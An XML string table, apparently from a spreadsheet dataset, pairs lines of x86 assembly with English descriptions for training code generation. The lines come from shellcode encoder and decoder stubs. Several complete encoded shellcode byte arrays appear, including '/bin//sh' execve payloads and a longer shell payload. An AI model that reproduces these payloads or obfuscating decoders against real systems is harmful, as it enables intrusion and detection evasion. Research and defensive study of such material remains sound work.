    <t>jz    short shellcode</t>
  </si>
  <si>
    <t>mov bh, byte [esi + edx + 2]</t>
  </si>
  <si>
    <t>save the byte in esi+edx+2 in bh</t>
  </si>
  <si>
    <t>call_shellcode function</t>
  </si>
  <si>
    <t>mov byte [esi + eax], bl</t>
  </si>
  <si>
    <t>move bl into the byte defined by the address esi + eax</t>
  </si>
  <si>
    <t>negative:</t>
  </si>
  <si>
    <t>in the negative function negate dl and increment dl to the next byte</t>
  </si>
  <si>
    <t>mov byte [edi], bl</t>
  </si>
  <si>
    <t>move bl into the byte in edi and perform xor operation with 0xDD</t>
  </si>
  <si>
    <t>mov byte [edx + eax], bl</t>
  </si>
  <si>
    <t>move bl into the byte at the address edx + eax</t>
  </si>
  <si>
    <t>jmp    decode</t>
  </si>
  <si>
    <t>jump to decode</t>
  </si>
  <si>
    <t>xor ax, bx</t>
  </si>
  <si>
    <t>perform xor between ax and bx and jump to call decoded if the result is zero</t>
  </si>
  <si>
    <t>jump to decode and repeat the decoding process for the next word</t>
  </si>
  <si>
    <t>mov    dl, 0xff</t>
  </si>
  <si>
    <t>move 0xff to dl</t>
  </si>
  <si>
    <t>mov dl, byte [esi + 1]</t>
  </si>
  <si>
    <t>move the byte in esi+1 to dl</t>
  </si>
  <si>
    <t>mov   ax, word [edi + 1 + ecx]</t>
  </si>
  <si>
    <t>mov the word at the address edi+1+ecx into ax</t>
  </si>
  <si>
    <t>encoded_shellcode: db 0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73, 0x2f, 0x68, 0x69, 0x62, 0x87, 0x6e, 0xb0, 0xe3, 0xcd, 0x0b, 0x90, 0x80</t>
  </si>
  <si>
    <t>enocoded_shellcode is an array of bytes 0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73, 0x2f, 0x68, 0x69, 0x62, 0x87, 0x6e, 0xb0, 0xe3, 0xcd, 0x0b, 0x90, 0x80</t>
  </si>
  <si>
    <t>mov cl, byte [esi + edx + 3]</t>
  </si>
  <si>
    <t>save the byte in esi+edx+3 in cl</t>
  </si>
  <si>
    <t>call decoder_setup</t>
  </si>
  <si>
    <t>cmp byte [esi], bl</t>
  </si>
  <si>
    <t>jump to not_equal if the current byte of the shellcode is not equal to bl</t>
  </si>
  <si>
    <t>add edi, 2</t>
  </si>
  <si>
    <t>add 2 to edi</t>
  </si>
  <si>
    <t>not dl</t>
  </si>
  <si>
    <t>xor byte [edi], 0xDD</t>
  </si>
  <si>
    <t>jz call_decoded</t>
  </si>
  <si>
    <t>inc_dec:</t>
  </si>
  <si>
    <t>define inc_dec</t>
  </si>
  <si>
    <t>shellcode: db 0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87</t>
  </si>
  <si>
    <t>define shellcode as array of bytes 0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87</t>
  </si>
  <si>
    <t>inc    dx</t>
  </si>
  <si>
    <t>increment dx by one</t>
  </si>
  <si>
    <t>shr dl,1</t>
  </si>
  <si>
    <t>shift right dl by 1</t>
  </si>
  <si>
    <t>xor   ax, bx</t>
  </si>
  <si>
    <t>perform xor between ax and bx</t>
  </si>
  <si>
    <t>mov ch, byte [esi + edx + 4]</t>
  </si>
  <si>
    <t>save the byte in esi+edx+4 in ch</t>
  </si>
  <si>
    <t>shellcode: db 0x0e,0x3a,0x94,0x12,0x12,0x12,0xb2,0x9b,0x37,0xc3,0x52,0xb6,0x9d,0xa2,0xc2,0x9d,0xa4,0x1e,0x9d,0xa4,0xe6,0x9d,0x84,0xfa,0x21,0x49,0xdc,0xf8,0xc3,0x11,0x7e,0xce,0xb3,0x8e,0x14,0xfe,0xf2,0x53,0x61,0x1f,0x13,0x59,0x34,0x04,0xa4,0xa9,0x9d,0xa4,0xe2,0x9d,0xdc,0xce,0x9d,0xde,0xe3,0x8a,0x35,0xda,0x13,0x23,0xa3,0x9d,0xab,0xf2,0x13,0x25,0x9d,0xdb,0xea,0x35,0xcc,0xdb,0x9d,0xc6,0x9d,0x13,0x28,0xc3,0x11,0x7e,0x53,0x61,0x1f,0x13,0x59,0xca,0x32,0x87,0x08,0x15,0x8f,0x0a,0xcd,0x8f,0xf6,0x87,0x36,0xaa,0x9d,0xaa,0xf6,0x13,0x25,0xb8,0x9d,0x1e,0xdd,0x9d,0xaa,0xee,0x13,0x25,0x9d,0x16,0x9d,0x13,0x22,0x9b,0xd6,0xf6,0xf6,0xad,0xad,0xb3,0xab,0xac,0xa3,0x11,0x32,0xb1,0xb1,0xac,0x9d,0xe4,0x3d,0x9f,0xaf,0xba,0xc5,0xc4,0x12,0x12,0xba,0x89,0x85,0xc4,0xb1,0xa6,0xba,0xde,0x89,0xf8,0x19,0x11,0x27,0x4a,0x62,0x13,0x12,0x12,0xfb,0x56,0xa6,0xa2,0xba,0xfb,0x92,0xbd,0x12,0x11,0x27,0xa2,0xa2,0xa2,0xa2,0xd2,0xa2,0xd2,0xa2,0xba,0x3c,0x21,0x31,0x32,0x11,0x27,0x69,0xbc,0x17,0xba,0x52,0x7a,0x86,0x59,0xba,0x14,0x12,0x13,0x4d,0x9b,0x38,0xbc,0xe2,0xa8,0xa9,0xba,0x6b,0x77,0x86,0xb3,0x11,0x27,0x97,0x52,0x86,0x1e,0x11,0xe0,0x1a,0x87,0x3e,0xba,0x02,0x47,0x74,0xa8,0x11,0x27,0xba,0xb5,0xbf,0xb6,0x12,0x9b,0x35,0xa9,0xa9,0xa9,0xc3,0x08,0xbc,0xe4,0xab,0xa8,0x34,0x0f,0xb8,0x59,0xd6,0xf6,0xce,0x13,0x13,0x9f,0xd6,0xf6,0xe2,0x58,0x12,0xd6,0xa6,0xa2,0xa8,0xa8,0xa8,0xd8,0xa8,0xe0,0xa8,0xa8,0xa5,0xa8,0xba,0x8b,0x5e,0xd1,0x98,0x11,0x27,0x9b,0x32,0xe0,0xa8,0xd8,0x11,0xc2,0xba,0x1a,0x99,0xef,0xb2,0x11,0x27,0x4d,0x02,0x47,0x74,0xa8,0xba,0x78,0x67,0x4f,0x6f,0x11,0x27,0xce,0x18,0x8e,0x1c,0x92,0x0d,0x32,0x87,0x17,0x4d,0xd9,0xe5,0x84,0xc1,0xbc,0x12,0xa5,0x11,0x27,0x88</t>
  </si>
  <si>
    <t>encoder_shellcode is the array of bytes 0x0e,0x3a,0x94,0x12,0x12,0x12,0xb2,0x9b,0x37,0xc3,0x52,0xb6,0x9d,0xa2,0xc2,0x9d,0xa4,0x1e,0x9d,0xa4,0xe6,0x9d,0x84,0xfa,0x21,0x49,0xdc,0xf8,0xc3,0x11,0x7e,0xce,0xb3,0x8e,0x14,0xfe,0xf2,0x53,0x61,0x1f,0x13,0x59,0x34,0x04,0xa4,0xa9,0x9d,0xa4,0xe2,0x9d,0xdc,0xce,0x9d,0xde,0xe3,0x8a,0x35,0xda,0x13,0x23,0xa3,0x9d,0xab,0xf2,0x13,0x25,0x9d,0xdb,0xea,0x35,0xcc,0xdb,0x9d,0xc6,0x9d,0x13,0x28,0xc3,0x11,0x7e,0x53,0x61,0x1f,0x13,0x59,0xca,0x32,0x87,0x08,0x15,0x8f,0x0a,0xcd,0x8f,0xf6,0x87,0x36,0xaa,0x9d,0xaa,0xf6,0x13,0x25,0xb8,0x9d,0x1e,0xdd,0x9d,0xaa,0xee,0x13,0x25,0x9d,0x16,0x9d,0x13,0x22,0x9b,0xd6,0xf6,0xf6,0xad,0xad,0xb3,0xab,0xac,0xa3,0x11,0x32,0xb1,0xb1,0xac,0x9d,0xe4,0x3d,0x9f,0xaf,0xba,0xc5,0xc4,0x12,0x12,0xba,0x89,0x85,0xc4,0xb1,0xa6,0xba,0xde,0x89,0xf8,0x19,0x11,0x27,0x4a,0x62,0x13,0x12,0x12,0xfb,0x56,0xa6,0xa2,0xba,0xfb,0x92,0xbd,0x12,0x11,0x27,0xa2,0xa2,0xa2,0xa2,0xd2,0xa2,0xd2,0xa2,0xba,0x3c,0x21,0x31,0x32,0x11,0x27,0x69,0xbc,0x17,0xba,0x52,0x7a,0x86,0x59,0xba,0x14,0x12,0x13,0x4d,0x9b,0x38,0xbc,0xe2,0xa8,0xa9,0xba,0x6b,0x77,0x86,0xb3,0x11,0x27,0x97,0x52,0x86,0x1e,0x11,0xe0,0x1a,0x87,0x3e,0xba,0x02,0x47,0x74,0xa8,0x11,0x27,0xba,0xb5,0xbf,0xb6,0x12,0x9b,0x35,0xa9,0xa9,0xa9,0xc3,0x08,0xbc,0xe4,0xab,0xa8,0x34,0x0f,0xb8,0x59,0xd6,0xf6,0xce,0x13,0x13,0x9f,0xd6,0xf6,0xe2,0x58,0x12,0xd6,0xa6,0xa2,0xa8,0xa8,0xa8,0xd8,0xa8,0xe0,0xa8,0xa8,0xa5,0xa8,0xba,0x8b,0x5e,0xd1,0x98,0x11,0x27,0x9b,0x32,0xe0,0xa8,0xd8,0x11,0xc2,0xba,0x1a,0x99,0xef,0xb2,0x11,0x27,0x4d,0x02,0x47,0x74,0xa8,0xba,0x78,0x67,0x4f,0x6f,0x11,0x27,0xce,0x18,0x8e,0x1c,0x92,0x0d,0x32,0x87,0x17,0x4d,0xd9,0xe5,0x84,0xc1,0xbc,0x12,0xa5,0x11,0x27,0x88</t>
  </si>
  <si>
    <t>jne not_equal</t>
  </si>
  <si>
    <t>point to the next byte in the eax register</t>
  </si>
  <si>
    <t>inc dl</t>
  </si>
  <si>
    <t>define call_decoder and call decoder function</t>
  </si>
  <si>
    <t>shr ax, cl</t>
  </si>
  <si>
    <t>shift right ax by the contents of cl and negate the word in ax</t>
  </si>
  <si>
    <t>decoded_shellcode:</t>
  </si>
  <si>
    <t>execute decoded_shellcode function</t>
  </si>
  <si>
    <t>next byte in the encoded shellcode</t>
  </si>
  <si>
    <t>sub    bl, BYTE [esi]</t>
  </si>
  <si>
    <t>subtract the current byte of the shellcode from bl</t>
  </si>
  <si>
    <t>mov byte [esi + 1], dl</t>
  </si>
  <si>
    <t>move dl into the byte in esi+1</t>
  </si>
  <si>
    <t>mov   word [edi], ax</t>
  </si>
  <si>
    <t>move ax into the word in edi</t>
  </si>
  <si>
    <t>xor bl, byte [esi + edx]</t>
  </si>
  <si>
    <t>perform the xor between bl and the byte in esi+edx</t>
  </si>
  <si>
    <t>perform the xor between the byte in esi and dl</t>
  </si>
  <si>
    <t>add al, 3</t>
  </si>
  <si>
    <t>add 3 to al</t>
  </si>
  <si>
    <t>not word ax</t>
  </si>
  <si>
    <t>call [esp]</t>
  </si>
  <si>
    <t>loop check_even_odd</t>
  </si>
  <si>
    <t>decrease the counter and jump to check_even_odd if not zero else jump short to shellcode</t>
  </si>
  <si>
    <t>sub    dx, bx</t>
  </si>
  <si>
    <t>subtract bx from dx</t>
  </si>
  <si>
    <t>inc   ecx</t>
  </si>
  <si>
    <t>point to the next byte in ecx</t>
  </si>
  <si>
    <t>xor bh, byte [esi + edx]</t>
  </si>
  <si>
    <t>perform the xor between bh and the byte in esi+edx</t>
  </si>
  <si>
    <t>decode_pr:</t>
  </si>
  <si>
    <t>decode_pr function</t>
  </si>
  <si>
    <t>jmp short switch</t>
  </si>
  <si>
    <t>jump short to switch</t>
  </si>
  <si>
    <t>decrement the counter and jump to decode if not zero else jumo to edx</t>
  </si>
  <si>
    <t xml:space="preserve">EncodedShellcode: db \xeb\x1d\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x8a\x1c\x06\x80\xf3\xaa\x75\x10\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xe8\xde\xff\xff\xff\x31\xaa\xc0\xaa\x50\xaa\x68\xaa\x2f\xaa\x2f\xaa\x73\xaa\x68\xaa\x68\xaa\x2f\xaa\x62\xaa\x69\xaa\x6e\xaa\x89\xaa\xe3\xaa\x50\xaa\x89\xaa\xe2\xaa\x53\xaa\x89\xaa\xe1\xaa\xb0\xaa\x0b\xaa\xcd\xaa\x80\xaa\xbb\xbb
</t>
  </si>
  <si>
    <t xml:space="preserve">define the array of bytes EncodedShellcode and initialize to \xeb\x1d\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x8a\x1c\x06\x80\xf3\xaa\x75\x10\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xe8\xde\xff\xff\xff\x31\xaa\xc0\xaa\x50\xaa\x68\xaa\x2f\xaa\x2f\xaa\x73\xaa\x68\xaa\x68\xaa\x2f\xaa\x62\xaa\x69\xaa\x6e\xaa\x89\xaa\xe3\xaa\x50\xaa\x89\xaa\xe2\xaa\x53\xaa\x89\xaa\xe1\xaa\xb0\xaa\x0b\xaa\xcd\xaa\x80\xaa\xbb\xbb
</t>
  </si>
  <si>
    <t>move al into edi</t>
  </si>
  <si>
    <t>jmp short shellcode</t>
  </si>
  <si>
    <t>mov    BYTE [esi], dl</t>
  </si>
  <si>
    <t>move dl into the byte in esi</t>
  </si>
  <si>
    <t>lea   edi, [edi + 2]</t>
  </si>
  <si>
    <t>load the address of edi+2 into edi</t>
  </si>
  <si>
    <t>xor cl, byte [esi + edx]</t>
  </si>
  <si>
    <t>perform the xor between cl and the byte in esi+edx</t>
  </si>
  <si>
    <t>decrease the counter and jump to decode if not zero</t>
  </si>
  <si>
    <t>call_decoder label</t>
  </si>
  <si>
    <t>clear eax, ebx and ecx</t>
  </si>
  <si>
    <t>jmp edx</t>
  </si>
  <si>
    <t>define call_decoder and call decoder</t>
  </si>
  <si>
    <t>jmp   short decode</t>
  </si>
  <si>
    <t>xor ch, byte [esi + edx]</t>
  </si>
  <si>
    <t>perform the xor between ch and the byte in esi+edx</t>
  </si>
  <si>
    <t>call the decoder function</t>
  </si>
  <si>
    <t>notdecode:</t>
  </si>
  <si>
    <t>notdecode function</t>
  </si>
  <si>
    <t>define call_shellcode and call decoder function</t>
  </si>
  <si>
    <t>common_commands:</t>
  </si>
  <si>
    <t xml:space="preserve">in common_commands point to the next byte in esi </t>
  </si>
  <si>
    <t>formatting:</t>
  </si>
  <si>
    <t>formatting label</t>
  </si>
  <si>
    <t>mov byte [esp + eax], ch</t>
  </si>
  <si>
    <t>move ch into the byte in esp+eax</t>
  </si>
  <si>
    <t>not_equal:</t>
  </si>
  <si>
    <t>not_equal label</t>
  </si>
  <si>
    <t>shellcode: db 0xc6,0x02,0x80,0x01,0x81,0x03,0xd1,0x01,0xbe,0x02,0x5f,0x01,0x98,0x03,0x1c,0x06,0x60,0x08,0xf6,0x04,0xc5,0x01,0x92,0x04,0x30,0x07,0x64,0x06,0x3a,0x04,0x58,0x08,0x4f,0x03,0x59,0x05,0xd2,0x06,0x81,0x08,0x1a,0x04,0x5f,0x07,0x03,0x08,0xd8,0x04,0x0c,0x04, 0xbb, 0xbb</t>
  </si>
  <si>
    <t>shellcode is an array of bytes 0xc6,0x02,0x80,0x01,0x81,0x03,0xd1,0x01,0xbe,0x02,0x5f,0x01,0x98,0x03,0x1c,0x06,0x60,0x08,0xf6,0x04,0xc5,0x01,0x92,0x04,0x30,0x07,0x64,0x06,0x3a,0x04,0x58,0x08,0x4f,0x03,0x59,0x05,0xd2,0x06,0x81,0x08,0x1a,0x04,0x5f,0x07,0x03,0x08,0xd8,0x04,0x0c,0x04, 0xbb, 0xbb</t>
  </si>
  <si>
    <t>define the call_shellcode function and call decoder</t>
  </si>
  <si>
    <t>encoded_shellcode: dw 0x545, 0x4a3, 0x583, 0x5d3, 0x541, 0x541, 0x439, 0x5d3, 0x5d3, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x411, 0x4eb, 0x443, 0x509, 0x48d, 0x423, 0x539</t>
  </si>
  <si>
    <t>define encoded_shellcode as array of words 0x545, 0x4a3, 0x583, 0x5d3, 0x541, 0x541, 0x439, 0x5d3, 0x5d3, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x411, 0x4eb, 0x443, 0x509, 0x48d, 0x423, 0x539</t>
  </si>
  <si>
    <t>mov eax, edi</t>
  </si>
  <si>
    <t>move edi to eax</t>
  </si>
  <si>
    <t>mov byte [esp + eax + 1], cl</t>
  </si>
  <si>
    <t>move cl into the byte in esp+eax+1</t>
  </si>
  <si>
    <t>mov bl, [esi]</t>
  </si>
  <si>
    <t>move the current byte of the shellcode to the bl</t>
  </si>
  <si>
    <t>mov al, byte [esi+1+ebp]</t>
  </si>
  <si>
    <t>Put the byte at the address esi+1+ebp into al</t>
  </si>
  <si>
    <t>move bl into the byte in edi and negate the result</t>
  </si>
  <si>
    <t>jmp short main</t>
  </si>
  <si>
    <t>jump short to main</t>
  </si>
  <si>
    <t>shellcode: db 0x62,0x60,0xa0,0x34,0x5e,0x97,0xe6,0x34,0xd0,0x97,0xc4,0xb4,0xdc,0xc4,0xc7,0x28,0x13,0x71,0xa6,0xc4,0xc3,0x58,0x16,0xe6,0x01</t>
  </si>
  <si>
    <t>define shellcode as array of bytes 0x62,0x60,0xa0,0x34,0x5e,0x97,0xe6,0x34,0xd0,0x97,0xc4,0xb4,0xdc,0xc4,0xc7,0x28,0x13,0x71,0xa6,0xc4,0xc3,0x58,0x16,0xe6,0x01</t>
  </si>
  <si>
    <t>decrement the counter and jump to decode routine if it is not zero else jump to Shellcode label</t>
  </si>
  <si>
    <t>mov bl, byte [eax]</t>
  </si>
  <si>
    <t>move the byte in eax to bl</t>
  </si>
  <si>
    <t>call  decoder</t>
  </si>
  <si>
    <t>mov byte [esp + eax + 2], bh</t>
  </si>
  <si>
    <t>move bh into the byte in esp+eax+2</t>
  </si>
  <si>
    <t>move the previous byte of the shellcode to dl</t>
  </si>
  <si>
    <t>mov ecx, ebp</t>
  </si>
  <si>
    <t>copy the value of EBP to ECX</t>
  </si>
  <si>
    <t>not byte [edi]</t>
  </si>
  <si>
    <t>EncodedShellcode: db 0x32,0x51,0x30,0x74,0x69,0x63,0x6f,0xe4,0x8a,0x54,0xe2,0x0c,0x81,0xc1,0x69,0x30,0x69,0x30,0x6a,0x8a,0x51,0xe3,0x8a,0xb1,0xce</t>
  </si>
  <si>
    <t>define the array of bytes EncodedShellcode and initialize to 0x32,0x51,0x30,0x74,0x69,0x63,0x6f,0xe4,0x8a,0x54,0xe2,0x0c,0x81,0xc1,0x69,0x30,0x69,0x30,0x6a,0x8a,0x51,0xe3,0x8a,0xb1,0xce</t>
  </si>
  <si>
    <t>shellcode_length equ $-shellcode</t>
  </si>
  <si>
    <t>define shellcode_length equal to the size of shellcode</t>
  </si>
  <si>
    <t>perform xor between bl and 0xBB and jump to encoded if the result is zero</t>
  </si>
  <si>
    <t>shellcode: db 0x31,0xc0,0x31,0xdb,0x31,0xc9,0x31,0xd2,0xb2,0xa4,0xeb,0x1f,0x5e,0x8d,0x3e,0x8a,0x1c,0x0f,0x88,0xdf,0x88,0xd0,0x30,0xd8,0x74,0x16,0x66,0x8b,0x44,0x0f,0x01,0x66,0x31,0xd8,0x66,0x89,0x07,0x41,0x8d,0x7f,0x02,0xeb,0xe4,0xe8,0xdc,0xff,0xff,0xff,0x7d,0x4c,0xa6,0x09,0xfe,0xea,0xd8,0x8b,0x9b,0x0c,0x5f,0x66,0x30,0x32,0xb9,0x07,0xe6,0xb7,0x0f,0x69,0xc2,0xab,0x2b,0xf0,0x3e,0x60,0x6c,0xea,0x82,0xe8,0x63,0x63,0x72,0x68,0x34,0x02,0xeb,0xfb,0xba,0xef,0xbf,0x66,0xf4,0x15,0x9e,0xbb,0xdd,0xe3,0x73,0xbe,0xf3,0xbb,0x32,0xfa,0xeb,0xef,0x58,0x20,0x24,0x90,0xe3,0x85,0x2e,0x64,0xe4,0x27,0x59,0xe9,0x3f,0xee,0x23,0x6e,0x63,0xf0,0x3a,0x47,0x2d,0x78,0x68,0x30,0xa5,0x66,0xe6,0x2f,0x69,0x10,0x91,0xfa,0x92,0xd5,0x3e,0x11,0x4d,0xf4,0x9c,0x9c,0x16,0x39,0x74,0xa0,0xc9,0xce,0xd2,0x5b,0x31,0x5c,0x0c,0x0f,0xfb,0x72,0x1a,0xb6,0x06,0xbd,0xd1,0x1c,0x51,0xa4</t>
  </si>
  <si>
    <t>shellcode contains the bytes 0x31,0xc0,0x31,0xdb,0x31,0xc9,0x31,0xd2,0xb2,0xa4,0xeb,0x1f,0x5e,0x8d,0x3e,0x8a,0x1c,0x0f,0x88,0xdf,0x88,0xd0,0x30,0xd8,0x74,0x16,0x66,0x8b,0x44,0x0f,0x01,0x66,0x31,0xd8,0x66,0x89,0x07,0x41,0x8d,0x7f,0x02,0xeb,0xe4,0xe8,0xdc,0xff,0xff,0xff,0x7d,0x4c,0xa6,0x09,0xfe,0xea,0xd8,0x8b,0x9b,0x0c,0x5f,0x66,0x30,0x32,0xb9,0x07,0xe6,0xb7,0x0f,0x69,0xc2,0xab,0x2b,0xf0,0x3e,0x60,0x6c,0xea,0x82,0xe8,0x63,0x63,0x72,0x68,0x34,0x02,0xeb,0xfb,0xba,0xef,0xbf,0x66,0xf4,0x15,0x9e,0xbb,0xdd,0xe3,0x73,0xbe,0xf3,0xbb,0x32,0xfa,0xeb,0xef,0x58,0x20,0x24,0x90,0xe3,0x85,0x2e,0x64,0xe4,0x27,0x59,0xe9,0x3f,0xee,0x23,0x6e,0x63,0xf0,0x3a,0x47,0x2d,0x78,0x68,0x30,0xa5,0x66,0xe6,0x2f,0x69,0x10,0x91,0xfa,0x92,0xd5,0x3e,0x11,0x4d,0xf4,0x9c,0x9c,0x16,0x39,0x74,0xa0,0xc9,0xce,0xd2,0x5b,0x31,0x5c,0x0c,0x0f,0xfb,0x72,0x1a,0xb6,0x06,0xbd,0xd1,0x1c,0x51,0xa4</t>
  </si>
  <si>
    <t>mov byte [esp + eax + 3], bl</t>
  </si>
  <si>
    <t>move bl into the byte in esp+eax+3</t>
  </si>
  <si>
    <t>perform the xor between the current byte in esi and dl</t>
  </si>
  <si>
    <t>xor cl, 0x32</t>
  </si>
  <si>
    <t>perform xor between cl and 0x32 and jump short to EncodedShellcode is the result is zero</t>
  </si>
  <si>
    <t>increment edi</t>
  </si>
  <si>
    <t>call_decoded:</t>
  </si>
  <si>
    <t>define call_decoded and execute it</t>
  </si>
  <si>
    <t>jz encoded</t>
  </si>
  <si>
    <t>cmp dword [esi + edx + 5], edi</t>
  </si>
  <si>
    <t>jump to execute_shellcode if the doubleword in esi+edx+5 is equal to edi</t>
  </si>
  <si>
    <t>je short EncodedShellcode</t>
  </si>
  <si>
    <t>in the function call_decoder call the decoder routine and define Shellcode as array of bytes 0xeb,0x25,0x5e,0x31,0xc9,0xb1,0x1e,0x80,0x3e,0x07,0x7c,0x05,0x80,0x2e,0x07,0xeb,0x11,0x31,0xdb,0x31,0xd2,0xb3,0x07,0xb2,0xff,0x66,0x42,0x2a,0x1e,0x66,0x29,0xda,0x88,0x16,0x46,0xe2,0xe2,0xeb,0x05,0xe8,0xd6,0xff,0xff,0xff,0x38,0xc7,0x57,0x6f,0x69,0x68,0x7a,0x6f,0x6f,0x69,0x70,0x75,0x36,0x6f,0x36,0x36,0x36,0x36,0x90,0xea,0x57,0x90,0xe9,0x5a,0x90,0xe8,0xb7,0x12,0xd4,0x87</t>
  </si>
  <si>
    <t>jz execute_shellcode</t>
  </si>
  <si>
    <t>decrease the counter and jump to decode if not zero else jump short to Shellcode</t>
  </si>
  <si>
    <t>mov cl, al</t>
  </si>
  <si>
    <t xml:space="preserve">Put the contetns in al to EAX </t>
  </si>
  <si>
    <t>format:</t>
  </si>
  <si>
    <t>define format routine</t>
  </si>
  <si>
    <t>inc edx</t>
  </si>
  <si>
    <t>point to the next double word in edx</t>
  </si>
  <si>
    <t>jmp short Shellcode</t>
  </si>
  <si>
    <t>sub cl, dl</t>
  </si>
  <si>
    <t>subtract the contents of dl from the cl register</t>
  </si>
  <si>
    <t>enc:</t>
  </si>
  <si>
    <t>define enc function and call decoder</t>
  </si>
  <si>
    <t>Shellcode: db 0xeb,0x25,0x5e,0x31,0xc9,0xb1,0x1e,0x80,0x3e,0x07,0x7c,0x05,0x80,0x2e,0x07,0xeb,0x11,0x31,0xdb,0x31,0xd2,0xb3,0x07,0xb2,0xff,0x66,0x42,0x2a,0x1e,0x66,0x29,0xda,0x88,0x16,0x46,0xe2,0xe2,0xeb,0x05,0xe8,0xd6,0xff,0xff,0xff,0x38,0xc7,0x57,0x6f,0x69,0x68,0x7a,0x6f,0x6f,0x69,0x70,0x75,0x36,0x6f,0x36,0x36,0x36,0x36,0x90,0xea,0x57,0x90,0xe9,0x5a,0x90,0xe8,0xb7,0x12,0xd4,0x87</t>
  </si>
  <si>
    <t>mov bl, cl</t>
  </si>
  <si>
    <t>backup the contents of cl into bl</t>
  </si>
  <si>
    <t>define call_decoder</t>
  </si>
  <si>
    <t>mov cl, byte [eax]</t>
  </si>
  <si>
    <t>move the byte in eax to cl</t>
  </si>
  <si>
    <t>mov al, cl</t>
  </si>
  <si>
    <t>Backup cl into al</t>
  </si>
  <si>
    <t>encoded: dw 0x04, 0x539, 0x9d9, 0x6c9, 0xfc9, 0xc49, 0xc29, 0x839, 0xdf9, 0xc49, 0xc49, 0x839, 0x839, 0xce9, 0xc59, 0x259, 0x4f9, 0xfc9, 0x259, 0x4e9, 0xff9, 0x259, 0x4d9, 0x1c9, 0xa79, 0x619, 0x2c9, 0x539</t>
  </si>
  <si>
    <t>define encoded as array of words 0x04, 0x539, 0x9d9, 0x6c9, 0xfc9, 0xc49, 0xc29, 0x839, 0xdf9, 0xc49, 0xc49, 0x839, 0x839, 0xce9, 0xc59, 0x259, 0x4f9, 0xfc9, 0x259, 0x4e9, 0xff9, 0x259, 0x4d9, 0x1c9, 0xa79, 0x619, 0x2c9, 0x539</t>
  </si>
  <si>
    <t>xor cl, 0xAA</t>
  </si>
  <si>
    <t>perform xor between cl and 0xAA and jump to Next_Cycle if the result is not zero</t>
  </si>
  <si>
    <t>shr bl, 4</t>
  </si>
  <si>
    <t>right shift the contents of bl by 4</t>
  </si>
  <si>
    <t>shellcode: db 0xbb,0xec,0x73,0xcc,0x3f,0x9d,0xbb,0x8d,0x51,0xbb,0xb5,0x1b,0xbb,0xb3,0x22,0xbb,0xf2,0x79,0xbb,0xae,0x8e,0xbb,0xb5,0x61,0xbb,0xb5,0x3d,0xbb,0xf2,0x6e,0xbb,0xf2,0x9f,0xbb,0xbf,0x10,0xbb,0xb4,0x89,0xcc,0x76,0x2d,0xcc,0x1c,0x2f,0xbb,0x8d,0x91,0xcc,0x76,0x7e,0xcc,0x1d,0x92,0xbb,0x8e,0x80,0xcc,0x76,0x7b,0xcc,0x1e,0xa7,0xcc,0x4f,0x7f,0xbb,0xd6,0x2b,0xcc,0x32,0x24,0xcc,0x7f,0x37,0xaa</t>
  </si>
  <si>
    <t>shellcode is array of bytes 0xbb,0xec,0x73,0xcc,0x3f,0x9d,0xbb,0x8d,0x51,0xbb,0xb5,0x1b,0xbb,0xb3,0x22,0xbb,0xf2,0x79,0xbb,0xae,0x8e,0xbb,0xb5,0x61,0xbb,0xb5,0x3d,0xbb,0xf2,0x6e,0xbb,0xf2,0x9f,0xbb,0xbf,0x10,0xbb,0xb4,0x89,0xcc,0x76,0x2d,0xcc,0x1c,0x2f,0xbb,0x8d,0x91,0xcc,0x76,0x7e,0xcc,0x1d,0x92,0xbb,0x8e,0x80,0xcc,0x76,0x7b,0xcc,0x1e,0xa7,0xcc,0x4f,0x7f,0xbb,0xd6,0x2b,0xcc,0x32,0x24,0xcc,0x7f,0x37,0xaa</t>
  </si>
  <si>
    <t>jnz Next_Cycle</t>
  </si>
  <si>
    <t>point to the next byte in edx</t>
  </si>
  <si>
    <t>Shellcode: db 0xf1,0x31,0x90,0x38,0x47,0x47,0x5c,0x1b,0x1b,0x47,0x4d,0x0b,0x07,0xe7,0x6a,0xb3,0xd9,0x6b,0xb1,0xda,0x68,0x51,0xbb,0xc6,0x4d</t>
  </si>
  <si>
    <t>define Shellcode as array of the bytes 0xf1,0x31,0x90,0x38,0x47,0x47,0x5c,0x1b,0x1b,0x47,0x4d,0x0b,0x07,0xe7,0x6a,0xb3,0xd9,0x6b,0xb1,0xda,0x68,0x51,0xbb,0xc6,0x4d</t>
  </si>
  <si>
    <t xml:space="preserve">shift left 28 bits of EAX </t>
  </si>
  <si>
    <t>add eax, 4</t>
  </si>
  <si>
    <t>add 4 to eax and jump to decode if the result is not zero</t>
  </si>
  <si>
    <t>shr eax, 24</t>
  </si>
  <si>
    <t xml:space="preserve">shift right 24 of EAX </t>
  </si>
  <si>
    <t>Cycle:</t>
  </si>
  <si>
    <t>define Cycle</t>
  </si>
  <si>
    <t>jnz decode</t>
  </si>
  <si>
    <t>add eax, ebx</t>
  </si>
  <si>
    <t xml:space="preserve">add the value on EBX to EAX </t>
  </si>
  <si>
    <t>mov dl, byte [eax]</t>
  </si>
  <si>
    <t>move the byte at address eax to dl</t>
  </si>
  <si>
    <t>mov bl, 0xff</t>
  </si>
  <si>
    <t>Value of  0xff to BL</t>
  </si>
  <si>
    <t>xor dl, 0xBB</t>
  </si>
  <si>
    <t>perform xor between dl and 0xBB and jump to Next_Cycle if the result is zero</t>
  </si>
  <si>
    <t>execute_shellcode:</t>
  </si>
  <si>
    <t>in execute_shelloce jump short to esp</t>
  </si>
  <si>
    <t>sub bl, al</t>
  </si>
  <si>
    <t>subtract the contents of al from the bl register</t>
  </si>
  <si>
    <t>jz Next_Cycle</t>
  </si>
  <si>
    <t>jmp short esp</t>
  </si>
  <si>
    <t>Put the value of bl to the position of EDI</t>
